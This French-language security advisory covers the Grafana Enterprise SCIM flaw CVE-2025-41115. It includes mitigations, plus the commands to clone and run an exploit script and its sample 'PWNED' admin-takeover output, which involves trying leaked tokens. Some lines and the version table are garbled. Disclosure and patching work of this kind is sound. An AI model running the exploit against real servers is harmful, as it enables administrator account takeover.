
CVE-2025-41115

Vulnérabilité critique d'escalade de privilèges SCIM dans Grafana Enterprise
CVE-2025-41115 est une vulnérabilité Critique (CVSS 10.0) dans Grafana Enterprise affectant sa fonctionnalité d'approvisionnement d'utilisateurs SCIM.
Lorsque l'approvisionnement SCIM est activé et que user_sync_enabled = true, un client SCIM malveillant peut envoyer un externalId numérique, que Grafana mappe par erreur à un identifiant utilisateur interne — permettant à un attaquant de usurper ou écraser des comptes existants, y compris les administrateurs.
⚠️ Grafana OSS n'est PAS affecté.
Conditions requises pour l'exploitation :
enableSCIM = true[auth.scim] user_sync_enabled = true| Version | Statut |
|---|---|
| 12.0.0 → 12.2.1 | ❌ Vulnérable |
| 12.3.0 | ✅ Corrigé |
| 12.2.1 (patched build) | ✅ Corrigé |
| 12.1.3 | ✅ Corrigé |
💡 Les services Grafana gérés (AWS/Azure/Grafana Cloud) ont été corrigés par les fournisseurs.
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
ou copiez-collez simplement le script ci-dessus dans un fichier
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
Quand l'exploit fonctionne (c'est-à-dire que la cible est vulnérable et que le jeton est valide), vous verrez une sortie exactement comme celle-ci : texte
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
Mettez à jour vers 12.3.0 ou l'une des versions de maintenance corrigées.
Si vous n'utilisez pas l'approvisionnement SCIM, assurez-vous d'avoir :
enableSCIM = false
ou
[auth.scim]
user_sync_enabled = false
Recherchez :
externalIdAssurez-vous que seuls les fournisseurs d'identité de confiance sont autorisés à communiquer avec votre point de terminaison SCIM.
Surveillez les connexions suspectes, les événements de création d'utilisateurs ou les prises de contrôle d'administrateurs.
Cette PoC est destinée uniquement aux tests de sécurité autorisés et à un usage éducatif sur les systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite de test. Toute utilisation non autorisée est illégale et peut entraîner des poursuites pénales. L'auteur et le distributeur déclinent toute responsabilité en cas de mauvaise utilisation. Corrigez immédiatement (≥12.0.6 / 12.3.0+).
| 12.0.6 | ✅ Corrigé |